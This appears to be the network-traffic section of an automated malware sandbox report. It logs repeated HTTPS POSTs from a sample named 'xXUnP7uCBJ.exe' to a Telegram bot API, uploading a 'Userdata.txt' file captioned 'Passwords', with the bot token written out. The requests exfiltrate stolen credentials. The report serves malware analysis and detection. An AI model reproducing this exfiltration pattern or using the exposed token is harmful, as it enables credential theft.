                                                                                                            2025-01-10 20:41:19 UTC539INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44645,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541679,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.849891149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:21 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31b700ceb690
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:41:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 37 30 30 63 65 62 36 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31b700ceb690Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:21 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:21 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:21 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44647,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541681,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.849904149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:22 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31cd3062f03f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:41:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 64 33 30 36 32 66 30 33 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31cd3062f03fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:23 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:23 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:23 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44649,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541683,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.849917149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:24 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31e34ecd4894
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:41:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 33 34 65 63 64 34 38 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31e34ecd4894Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:24 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:24 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:24 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44651,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541684,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.849929149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:26 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31f7fbc37367
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 37 66 62 63 33 37 33 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31f7fbc37367Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:26 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:26 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:26 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44653,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541686,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.849942149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:27 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd320c9a0f5891
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 63 39 61 30 66 35 38 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd320c9a0f5891Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:28 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:28 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:28 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44655,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541688,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.849955149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:29 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd322544ac15bb
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 35 34 34 61 63 31 35 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd322544ac15bbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:30 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:30 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:30 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44657,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541690,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.849965149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:31 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3239c22019d9
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 39 63 32 32 30 31 39 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3239c22019d9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:31 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:31 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
